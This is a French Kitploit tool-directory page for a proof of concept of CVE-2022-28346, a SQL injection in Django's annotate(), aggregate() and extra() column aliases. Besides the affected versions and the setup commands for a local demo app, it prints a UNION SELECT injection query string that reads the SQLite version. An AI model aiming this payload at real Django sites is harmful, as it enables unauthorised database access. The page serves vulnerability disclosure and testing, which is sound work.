Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-28346 — Un problème a été découvert dans Django 2.2 avant 2.2.28, 3.2 avant 3.2.13 et 4.0 avant 4.0.4. Les méthodes QuerySet.annotate(), aggregate() et extra() sont sujettes à une injection SQL dans les alias de colonnes via un dictionnaire contrefait (avec expansion de dictionnaire) comme **kwargs passé. | Kitploit
Outils/GitHubGitHub/vincentinttsh/cve-2022-28346
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebSécurité des Bases de Données
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

Voir le dépôt
7il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Un problème a été découvert dans Django 2.2 avant 2.2.28, 3.2 avant 3.2.13 et 4.0 avant 4.0.4. Les méthodes QuerySet.annotate(), aggregate() et extra() sont sujettes à une injection SQL dans les alias de colonnes via un dictionnaire contrefait (avec expansion de dictionnaire) comme **kwargs passé.

Partager

CVE-2022-28346 PoC Tweet

Impact:

  • Potentielle injection SQL dans QuerySet.annotate(), aggregate() et extra().

Installation

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

Références

CVE Mitre

Django

Télécharger l’outil